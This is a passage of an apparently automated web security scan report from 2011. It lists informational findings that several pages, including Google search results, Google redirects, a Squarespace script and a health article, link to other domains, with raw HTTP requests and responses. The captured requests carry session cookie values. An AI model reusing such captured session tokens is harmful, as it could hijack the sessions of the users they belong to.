<h3 class="r"><a href="http://www.nmmlaw.com/index.php?option=com_google&view=advanced&id=1&Itemid=34" class=l onmousedown="return rwt(this,'','','','3','AFQjCNFM63GMFmvNW5Nqo-jjTTnyHb5jZg','','0CDEQFjAC')">Contact - <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:ydGCxRmlUHoJ:www.nmmlaw.com/index.php%3Foption%3Dcom_google%26view%3Dadvanced%26id%3D1%26Itemid%3D34+Norris+McLaughlin+and+Marcus&cd=3&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','3','AFQjCNGwzROYnEs6ah0x1VwGDtiNyvZQrg','','0CDYQIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.nmmlaw.com/index.php?option=com_content&task=view&id=97&Itemid=29" class=l onmousedown="return rwt(this,'','','','4','AFQjCNHYBMMOUcngzFRGnFsxVx9fNo_5SA','','0CDgQFjAD')">Dean M. Roberts - <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:o20gGlPA3KAJ:www.nmmlaw.com/index.php%3Foption%3Dcom_content%26task%3Dview%26id%3D97%26Itemid%3D29+Norris+McLaughlin+and+Marcus&cd=4&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','4','AFQjCNEgiD-RNFObzETvUJ5Y0_rDrfeczw','','0CD0QIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.martindale.com/Norris-McLaughlin-Marcus-PA/1122171-law-firm-office.htm" class=l onmousedown="return rwt(this,'','','','5','AFQjCNFXCb-TjB9FLotFPj5fJtXsGw9ERw','','0CEAQFjAE')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:E8p-bBdIctsJ:www.martindale.com/Norris-McLaughlin-Marcus-PA/1122171-law-firm-office.htm+Norris+McLaughlin+and+Marcus&cd=5&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','5','AFQjCNHPk8dUUmbBBwiQuQWJmYaPj5jRmA','','0CEUQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.linkedin.com/company/norris-mclaughlin-&-marcus" class=l onmousedown="return rwt(this,'','','','6','AFQjCNF8jmkigWfzgooG4u3OeA4GWZDImA','','0CEcQFjAF')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:AnQVWbDXdLoJ:www.linkedin.com/company/norris-mclaughlin-%26-marcus+Norris+McLaughlin+and+Marcus&cd=6&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','6','AFQjCNEvgLyYKJvxIIEIqCiEftAJacy0ow','','0CEwQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.lawyers.com/New-York/New-York/Norris-McLaughlin-and-Marcus,-P.A.-A-Professional-Corporation-441815-f.html" class=l onmousedown="return rwt(this,'','','','7','AFQjCNGhLalb7ZJx6clWLgDJaXHNy7NYag','','0CE0QFjAG')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:1RzHcbOZ2-oJ:www.lawyers.com/New-York/New-York/Norris-McLaughlin-and-Marcus,-P.A.-A-Professional-Corporation-441815-f.html+Norris+McLaughlin+and+Marcus&cd=7&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','7','AFQjCNGnO811vCQY-vN3eD2i3kCCrEfepg','','0CFQQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://probatelitigation.typepad.com/files/whitney-houston-counterclaim.pdf" class=l onmousedown="return rwt(this,'','','','8','AFQjCNELNxHUXUMpY-baAUtvWQF7K-I8Uw','','0CFYQFjAH')">Bryan Blaney, Esq. <em>
...[SNIP]...
<h3 class="r"><a href="http://www.superlawyers.com/new-jersey/lawfirm/Norris-McLaughlin-and-Marcus-PA/19762a0c-3ee4-4a57-9275-2f5c63695cae.html" class=l onmousedown="return rwt(this,'','','','9','AFQjCNF17xiD8UvQxKibesBfJE263nMmaQ','','0CFwQFjAI')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:wTxT1LsIQqgJ:www.superlawyers.com/new-jersey/lawfirm/Norris-McLaughlin-and-Marcus-PA/19762a0c-3ee4-4a57-9275-2f5c63695cae.html+Norris+McLaughlin+and+Marcus&cd=9&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','9','AFQjCNHXbhJCKoHrcYTt6yVAX6WzXcD3TA','','0CGEQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.uniset.ca/lloydata/css/331F3d406.htm" class=l onmousedown="return rwt(this,'','','','10','AFQjCNGrFxSZxFrtt9ZHklezCIviMLCorQ','','0CGIQFjAJ')">Morganroth & Morganroth v. <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:NJBT8-dvFGwJ:www.uniset.ca/lloydata/css/331F3d406.htm+Norris+McLaughlin+and+Marcus&cd=10&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','10','AFQjCNEQTxd9xyExB1HFdWQmxlPxhsYwsg','','0CGcQIDAJ')">Cached</a>
...[SNIP]...
<div><a href="http://www.greenbaumlaw.com/" class=l onmousedown="return rwt(this,'','','','11','AFQjCNH7MIL_a9WCrvGnkufVwsKEV6HPTQ','','0CGoQoggwCg')">Greenbaum Rowe Smith & Davis LLP</a>
...[SNIP]...
<div><a href="http://www.riker.com/" class=l onmousedown="return rwt(this,'','','','12','AFQjCNHN9glXgNQlAFRRM1YIVDgKmkb8MQ','','0CGwQoggwCw')">Riker, Danzig, Scherer, Hyland, Perretti, LLP</a>
...[SNIP]...
<div><a href="http://www.sillscummis.com/" class=l onmousedown="return rwt(this,'','','','13','AFQjCNHUJ-DHobUkXCwY-oCaDtAfNdBjvA','','0CG4QoggwDA')">Sills Cummis & Gross P.C.</a>
...[SNIP]...
<div><a href="http://www.mdmlaw.com/" class=l onmousedown="return rwt(this,'','','','14','AFQjCNFtuiRXVpweuIaQWSdkIeoJMkdtfg','','0CHAQoggwDQ')">McElroy, Deutsch & Mulvaney</a>
...[SNIP]...

18.171. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=New+York+Observer

The response contains the following links to other domains:

http://en.wikipedia.org/wiki/The_New_York_Observer
http://ma.tt/2011/06/new-york-observer/
http://mediamatters.org/blog/201107200012
http://nymag.com/
http://observer.com/
http://observer.guardian.co.uk/
http://topics.nytimes.com/topics/reference/timestopics/organizations/n/new_york_observer/index.html
http://webcache.googleusercontent.com/search?q=cache:92SHVesqVNQJ:en.wikipedia.org/wiki/The_New_York_Observer+New+York+Observer&cd=7&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:9GlhbxE6REQJ:observer.com/+New+York+Observer&cd=1&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:9KS5nnSr20sJ:ma.tt/2011/06/new-york-observer/+New+York+Observer&cd=13&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:CvVQstfzBVcJ:www.observer.com/channel/media/+New+York+Observer&cd=3&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:L2Tq_kCKRlEJ:wordpress.org/showcase/the-new-york-observer/+New+York+Observer&cd=9&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:LMRAWPGdIP4J:www.amazon.com/The-New-York-Observer/dp/B00005NIP2+New+York+Observer&cd=12&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:PXOFi8FwAjQJ:www.observer.com/channel/real-estate/+New+York+Observer&cd=2&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:ZGz-Pz554FUJ:www.politickerny.com/+New+York+Observer&cd=10&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:nAsVBGlwGJQJ:mediamatters.org/blog/201107200012+New+York+Observer&cd=8&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:v4CqNjEvVTcJ:topics.nytimes.com/topics/reference/timestopics/organizations/n/new_york_observer/index.html+New+York+Observer&cd=11&hl=en&ct=clnk&gl=us&source=www.google.com
http://wordpress.org/showcase/the-new-york-observer/
http://www.amazon.com/The-New-York-Observer/dp/B00005NIP2
http://www.charlotteobserver.com/2011/07/21/2470748/new-york-yankees-57-38-at-tampa.html
http://www.charlotteobserver.com/2011/07/21/2470759/st-louis-cardinals-50-47-at-new.html
http://www.newyorker.com/
http://www.observer.com/about-us
http://www.observer.com/advertising
http://www.observer.com/channel/culture/
http://www.observer.com/channel/daily-transom/
http://www.observer.com/channel/media/
http://www.observer.com/channel/politics/
http://www.observer.com/channel/real-estate/
http://www.observer.com/subscribe
http://www.politickerny.com/
http://www.theatlanticwire.com/entertainment/2011/07/Cathie-blacks-alleged/40242/
http://www.villagevoice.com/
http://www.youtube.com/results?q=New+York+Observer&um=1&ie=UTF-8&sa=N&hl=en&tab=w1

Request

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 16:11:41 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 84959

<!doctype html><head><title>New York Observer - Google Search</title><script>window.google={kEI:"vU8oTpqSNKTb0QG_89HiCg",kEXPI:"17259,28290,28505,28663,28936,29775,30316,30427,30464,30727,31406,31718"
...[SNIP]...
<li class=gbmtc><a onclick=gbar.qs(this) class=gbmt id=gb_36 onclick="gbar.qs(this);gbar.logger.il(1,{t:36})" href="http://www.youtube.com/results?q=New+York+Observer&um=1&ie=UTF-8&sa=N&hl=en&tab=w1">YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://observer.com/" class=l onmousedown="return rwt(this,'','','','1','AFQjCNGNc5Yc8DL3yvp2jvvbZBWKkCD2KQ','','0CC0QFjAA')">The <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:9GlhbxE6REQJ:observer.com/+New+York+Observer&cd=1&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','1','AFQjCNEUb6b-en_wihLzSRpjDooDp4CTtg','','0CC8QIDAA')">Cached</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.observer.com/channel/real-estate/" onmousedown="return rwt(this,'','','','1','AFQjCNHKQENPm4Rk6EocDQIL8jTbui8_ug','','0CDEQqwMoADAA')">Real Estate</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.observer.com/channel/culture/" onmousedown="return rwt(this,'','','','1','AFQjCNE7rgFJq9HhmGS-RTnkPn_HuSxmYg','','0CDIQqwMoATAA')">Culture</a></div><div class=sld><a class=sla href="http://www.observer.com/channel/media/" onmousedown="return rwt(this,'','','','1','AFQjCNEcgw_7YcMVZZr3Wlyc0tkzryQsJA','','0CDMQqwMoAjAA')">Media</a></div><div class=sld><a class=sla href="http://www.observer.com/channel/politics/" onmousedown="return rwt(this,'','','','1','AFQjCNGgNEF2QViy7sGXrBRDFP0d-yGAxg','','0CDQQqwMoAzAA')">Politics</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.observer.com/about-us" onmousedown="return rwt(this,'','','','1','AFQjCNGx9gKFY5xw0qALm-20FLqrP9JEZQ','','0CDUQqwMoBDAA')">About Us</a></div><div class=sld><a class=sla href="http://www.observer.com/subscribe" onmousedown="return rwt(this,'','','','1','AFQjCNEbiB0vct2ECahdHGaQ-V2ZYfr8UA','','0CDYQqwMoBTAA')">Subscriptions</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.observer.com/channel/daily-transom/" onmousedown="return rwt(this,'','','','1','AFQjCNGMa62gwcCd6RwrlCESTz3RH-NAvA','','0CDcQqwMoBjAA')">Transom</a></div><div class=sld><a class=sla href="http://www.observer.com/advertising" onmousedown="return rwt(this,'','','','1','AFQjCNFJASYR97mDHniQHIXfjjLFgwmU0Q','','0CDgQqwMoBzAA')">Advertising</a>
...[SNIP]...
<h3 class="r"><a href="http://www.observer.com/channel/real-estate/" class=l onmousedown="return rwt(this,'','','','2','AFQjCNHKQENPm4Rk6EocDQIL8jTbui8_ug','','0CDsQFjAB')">Real Estate | The <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:PXOFi8FwAjQJ:www.observer.com/channel/real-estate/+New+York+Observer&cd=2&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','2','AFQjCNEMrkn9cEOqUnYfTUAyGhzKOmAghQ','','0CD4QIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.observer.com/channel/media/" class=l onmousedown="return rwt(this,'','','','3','AFQjCNEcgw_7YcMVZZr3Wlyc0tkzryQsJA','','0CD8QFjAC')">Media | The <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:CvVQstfzBVcJ:www.observer.com/channel/media/+New+York+Observer&cd=3&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','3','AFQjCNG9jIW1B--ktIdOuN2wcL10l-NBtA','','0CEEQIDAC')">Cached</a>
...[SNIP]...
<li class=w0 style="list-style-position:outside;margin-top:5px"><a href="http://www.theatlanticwire.com/entertainment/2011/07/Cathie-blacks-alleged/40242/" class=l onmousedown="return rwt(this,'','','','4','AFQjCNFB1-xx1UxX4uWDwFtnEBcsmhjRXA','','0CEMQqQIwAw')">Cathie Black's Car Crash; Sotomayor Talks Chicken</a>
...[SNIP]...
<div style=max-width:509px><a href="http://www.charlotteobserver.com/2011/07/21/2470748/new-york-yankees-57-38-at-tampa.html" class=l onmousedown="return rwt(this,'','','','5','AFQjCNFJrYtOeMVJwmvYchTQsS0jNhRT0g','','0CEYQqQIwBA')"><em>
...[SNIP]...
<div style=max-width:509px><a href="http://www.charlotteobserver.com/2011/07/21/2470759/st-louis-cardinals-50-47-at-new.html" class=l onmousedown="return rwt(this,'','','','6','AFQjCNGIAim7KrzsuMsOfEphXbfJcm8Btg','','0CEkQqQIwBQ')">St. Louis Cardinals (50-47) at <em>
...[SNIP]...
<h3 class="r"><a href="http://en.wikipedia.org/wiki/The_New_York_Observer" class=l onmousedown="return rwt(this,'','','','7','AFQjCNHBcfULV3DOd6ECJmqSMe9jOKrllg','','0CE8QFjAG')">The <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:92SHVesqVNQJ:en.wikipedia.org/wiki/The_New_York_Observer+New+York+Observer&cd=7&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','7','AFQjCNEpQneavopKsLoT_5jxUcN9a2LPvg','','0CFEQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://mediamatters.org/blog/201107200012" class=l onmousedown="return rwt(this,'','','','8','AFQjCNHO3gxJ5REzK67-6LUZtnurqSkABw','','0CFMQFjAH')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:nAsVBGlwGJQJ:mediamatters.org/blog/201107200012+New+York+Observer&cd=8&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','8','AFQjCNFTEorHGvVAoYAGkJjAVOLRObNqxA','','0CFcQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://wordpress.org/showcase/the-new-york-observer/" class=l onmousedown="return rwt(this,'','','','9','AFQjCNEcojrssjtlVg1UIKAfBDZIf8a-xQ','','0CFgQFjAI')">WordPress ... Showcase .. The <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:L2Tq_kCKRlEJ:wordpress.org/showcase/the-new-york-observer/+New+York+Observer&cd=9&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','9','AFQjCNGU9C6UVHKN6cK_t5dNC8zZjDq9fw','','0CFoQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.politickerny.com/" class=l onmousedown="return rwt(this,'','','','10','AFQjCNEzX-jKaT1T3-BRzdm0AMKod08IMg','','0CFsQFjAJ')">PolitickerNY</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:ZGz-Pz554FUJ:www.politickerny.com/+New+York+Observer&cd=10&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','10','AFQjCNG43Gh-ceMlddGw7mnmfw9czMoLuA','','0CF0QIDAJ')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://topics.nytimes.com/topics/reference/timestopics/organizations/n/new_york_observer/index.html" class=l onmousedown="return rwt(this,'','','','11','AFQjCNGgbCcFUzfjsSSJ0Y60zUrrdnwP4A','','0CF4QFjAK')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:v4CqNjEvVTcJ:topics.nytimes.com/topics/reference/timestopics/organizations/n/new_york_observer/index.html+New+York+Observer&cd=11&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','11','AFQjCNEpvg8krPcf3fe055L9al7AQnbWjw','','0CGQQIDAK')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.amazon.com/The-New-York-Observer/dp/B00005NIP2" class=l onmousedown="return rwt(this,'','','','12','AFQjCNFmOxVbBsoj73xY0iCPLzgVj2W9Zg','','0CGYQFjAL')">The <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:LMRAWPGdIP4J:www.amazon.com/The-New-York-Observer/dp/B00005NIP2+New+York+Observer&cd=12&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','12','AFQjCNEJxQkHSDJvtLKugOzWBzEds9c8dQ','','0CGwQIDAL')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://ma.tt/2011/06/new-york-observer/" class=l onmousedown="return rwt(this,'','','','13','AFQjCNGkEePrjevQWB2OSS5At8gyjYQwkQ','','0CG4QFjAM')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:9KS5nnSr20sJ:ma.tt/2011/06/new-york-observer/+New+York+Observer&cd=13&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','13','AFQjCNGseRBC0QF515NOSiML7NROKj5gWA','','0CHAQIDAM')">Cached</a>
...[SNIP]...
<div><a href="http://nymag.com/" class=l onmousedown="return rwt(this,'','','','14','AFQjCNEi9gBUXjGRnsmmGzmkIl9XnLYn4g','','0CHIQoggwDQ')">New York Magazine</a>
...[SNIP]...
<div><a href="http://www.villagevoice.com/" class=l onmousedown="return rwt(this,'','','','15','AFQjCNFXvvzgJoKUpgTadoLawo07P6cIAg','','0CHQQoggwDg')">Village Voice</a>
...[SNIP]...
<div><a href="http://www.newyorker.com/" class=l onmousedown="return rwt(this,'','','','16','AFQjCNGx-p9UrGOHDOoi8ulrv9TdLR_AFA','','0CHYQoggwDw')">The New Yorker</a>
...[SNIP]...
<div><a href="http://observer.guardian.co.uk/" class=l onmousedown="return rwt(this,'','','','17','AFQjCNHxqWDgcSwd-huVR5Qeckk0komOvQ','','0CHgQoggwEA')">The Observer</a>
...[SNIP]...

18.172. http://www.google.com/url previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/url

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/url?sa=t&source=web&cd=2&ved=0CCoQFjAB&url=http%3A%2F%2Fwww.nmmlaw.com%2Findex.php%3Foption%3Dcom_content%26task%3Dview%26id%3D501%26Itemid%3D56&ei=ULwqTrzuF-fh0QGkpcDYCg&usg=AFQjCNGp383ovIDc1Yhu7zre07Rc4PHmkg

The response contains the following link to another domain:

http://www.nmmlaw.com/index.php?option=com_content&task=view&id=501&Itemid=56

Request

GET /url?sa=t&source=web&cd=2&ved=0CCoQFjAB&url=http%3A%2F%2Fwww.nmmlaw.com%2Findex.php%3Foption%3Dcom_content%26task%3Dview%26id%3D501%26Itemid%3D56&ei=ULwqTrzuF-fh0QGkpcDYCg&usg=AFQjCNGp383ovIDc1Yhu7zre07Rc4PHmkg HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; NID=49=W8r0AKxd5wk5CX1jyfDbNGqu0gNP9tvrFwquFIFVcdigP0YfOxWLbqIT-uh0HQif4kRtxM0Zmnl6hxXO7elxBhi5M5Shuv0bLm6MSaba7TZWWydFwvwYYpn2fEzjfe3s

Response

HTTP/1.1 302 Found
Location: http://www.nmmlaw.com/index.php?option=com_content&task=view&id=501&Itemid=56
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Sat, 23 Jul 2011 12:19:46 GMT
Server: gws
Content-Length: 286
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.nmmlaw.com/index.php?option=com_content&task=view&id=501&Itemid=56">here</A>
...[SNIP]...

18.173. http://www.google.com/url previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/url

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/url?sa=t&source=web&cd=1&ved=0CC8QFjAA&url=http%3A%2F%2Fwww.jackhenry.com%2F&ei=UXcoTvDABsK10AHA8tzjCg&usg=AFQjCNHG1cqvhrqN52I3_10ygLfKaNEmbQ

The response contains the following link to another domain:

http://www.jackhenry.com/

Request

GET /url?sa=t&source=web&cd=1&ved=0CC8QFjAA&url=http%3A%2F%2Fwww.jackhenry.com%2F&ei=UXcoTvDABsK10AHA8tzjCg&usg=AFQjCNHG1cqvhrqN52I3_10ygLfKaNEmbQ HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; NID=49=hF3sNFzNDiZMKMwt0WZVsaf-tISuy02NG32GFzcjWjmHZDjyHO4cH85LuW7T8eHtFsOa_-uBcVgFtj8eePDVp7JiXpDa_p72IxDR6LUJuVTSf2YVSO5Uj8_SPahG4RWl

Response

HTTP/1.1 302 Found
Location: http://www.jackhenry.com/
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Thu, 21 Jul 2011 19:01:13 GMT
Server: gws
Content-Length: 222
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.jackhenry.com/">here</A>
...[SNIP]...

18.174. http://www.google.com/url previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/url

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/url?sa=t&source=web&cd=1&ved=0CC0QFjAA&url=http%3A%2F%2Fobserver.com%2F&ei=vU8oTpqSNKTb0QG_89HiCg&usg=AFQjCNGNc5Yc8DL3yvp2jvvbZBWKkCD2KQ

The response contains the following link to another domain:

http://observer.com/

Request

GET /url?sa=t&source=web&cd=1&ved=0CC0QFjAA&url=http%3A%2F%2Fobserver.com%2F&ei=vU8oTpqSNKTb0QG_89HiCg&usg=AFQjCNGNc5Yc8DL3yvp2jvvbZBWKkCD2KQ HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=New+York+Observer
Cookie: PREF=ID=5f095d1913dfb266:U=94b487df0bd866af:FF=0:TM=1311179451:LM=1311259550:S=OkO5G-xMVZh3wrlr; NID=49=Mc75k8GaC4sODRf5gDiSshg7ZVBiCfL_peK--7yvryZzGeVuBMVM4SaPcjtGgf68flt1aAl6V7nItJhqlhvA7fFgIz41ztbNbR_3j6OjdY1RUGqfLgMHQ7CDj7_I7grK

Response

HTTP/1.1 302 Found
Location: http://observer.com/
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Thu, 21 Jul 2011 16:12:20 GMT
Server: gws
Content-Length: 217
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://observer.com/">here</A>.
...[SNIP]...

18.175. http://www.greatpondsma.org/universal/scripts/global.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.greatpondsma.org
Path:	/universal/scripts/global.js

Issue detail

The page was loaded from a URL containing a query string:

http://www.greatpondsma.org/universal/scripts/global.js?CE=27

The response contains the following links to other domains:

http://www.apple.com/safari/
http://www.firefox.com/
http://www.microsoft.com/ie/

Request

GET /universal/scripts/global.js?CE=27 HTTP/1.1
Host: www.greatpondsma.org
Proxy-Connection: keep-alive
Referer: http://www.greatpondsma.org/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=87536A4DDFC5C4B2E965B498758387AE.web125; ss_lastvisit=1311426616535; WebPersCookie=B2Hc4SKbaflWHou88w7usH+6wdXqHu2psE19EUGTmeBJisCZPUm/gk734KQiYR5etFU8jSleSlDi4k0=

Response

HTTP/1.1 200 OK
Cache-Control: private,max-age=94608000
Pragma: cache
X-ServedBy: web115
ETag: W/"41515-1311285756000"
Last-Modified: Thu, 21 Jul 2011 22:02:36 GMT
Content-Type: text/javascript
Server: SSWS
Content-Length: 41515
Date: Sat, 23 Jul 2011 13:10:21 GMT
X-Varnish: 3492347872 3472470938
Age: 137249
Via: 1.1 varnish
Connection: Keep-Alive
Vary: Accept-Encoding, User-Agent

var D=YAHOO.util.Dom;var E=YAHOO.util.Event;Squarespace=window.Squarespace||{};Squarespace.Interaction={};Squarespace.Constants={POPUPS_DISABLED_MESSAGE:"It appears that you may have a popup blocker e
...[SNIP]...
<br/><a href="http://www.firefox.com/">Click here to download Firefox (Free/Recommended) »</a><br/><a href="http://www.apple.com/safari/">Click here to download Safari (Free) »</a><br/><a href="http://www.microsoft.com/ie/">Click here to download IE7 (Free) »</a>
...[SNIP]...
<br/><a href="http://www.firefox.com/">Click here to download Firefox (Free/Recommended) »</a><br/><a href="http://www.apple.com/safari/">Click here to download Safari (Free) »</a><br/><a href="http://www.microsoft.com/ie/">Click here to download IE7 (Free) »</a>
...[SNIP]...

18.176. http://www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lifescript.com
Path:	/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx?utm_source=outbrain&utm_medium=cpc&utm_campaign=ADHD_Adult

The response contains the following links to other domains:

http://b.scorecardresearch.com/b?c1=2&c2=6035385&c3=&c4=&c5=&c6=&c15=&cv=1.3&cj=1
http://lifescript.us.intellitxt.com/intellitxt/front.asp?ipid=18057
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel1350.everesttech.net/1350/p?ev_transid={7F47B713-0E8E-4DBF-9FCF-DB4D4104C2A4}&ev_pageview=1&ev_category_cat_pageview=1
http://poweredby.kosmix.com/external/ads/kinsert/kosmixCL.js
